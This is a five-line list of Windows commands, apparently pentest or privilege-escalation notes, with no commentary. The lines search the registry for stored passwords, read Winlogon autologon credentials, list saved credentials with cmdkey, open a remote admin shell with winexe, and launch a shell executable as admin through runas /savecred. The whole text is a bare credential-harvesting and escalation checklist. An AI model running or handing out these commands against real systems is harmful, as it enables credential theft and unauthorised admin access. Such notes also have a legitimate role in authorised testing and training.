reg query HKLM /f password /t REG_SZ /s
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
winexe -U 'admin%password' //<target-IP> cmd.exe
cmdkey /list
runas /savecred /user:admin C:\shell.exe